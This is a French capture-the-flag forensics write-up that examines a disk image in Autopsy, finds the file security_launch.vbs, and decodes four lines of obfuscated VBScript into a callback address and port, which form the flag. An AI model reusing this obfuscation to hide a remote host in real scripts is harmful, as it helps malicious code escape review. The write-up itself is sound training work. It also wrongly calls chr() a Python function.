Post

suspicious_ntfs_drive

đť„ž Introduction

Intro

đť„ž Solution

Pour résoudre ce défi de forensic, j’ai commencé par analyser l’image avec le logiciel Autopsy. Notre objectif était de trouver les informations suivantes : filename.vbs_IP_port pour trouver le flag.

Autopsy

Nous avons trouvé un fichier nommé security_launch.vbs.

1
2
3
4
aaa = replace("hello","h","w")
bbb = StrReverse("86")
ccc = Right("90018000",4)
dest = "http://"+chr(49)+"93.1"+bbb+".1.42:"+ccc+"/dothethingzuulee"

đť„žđť„ž Analyse

Nous allons analyser chaque ligne :

aaa = replace(“hello”,”h”,”w”) –> remplace le h par w dans le chaine hello ce qui donne wello.
bbb = StrReverse(“86”) –> on reverse 86 ce qui donne 68
ccc = Right(“90018000”,4) –> on prends les 4 caractères à droite => 8000
dest = “http://”+chr(49)+”93.1”+bbb+”.1.42:”+ccc+”/dothethingzuulee”
chr() est une fonction python qui convertie la valeur en ASCII ici 49 = 1

donc si on remplace nos valeurs on obtien : 193.168.1.42:8000

đť„ž FLAG : leHACK{security_launch.vbs_193.168.1.42_8000} đť„ž

đť„ž Conclusion

This post is licensed under CC BY 4.0 by the author.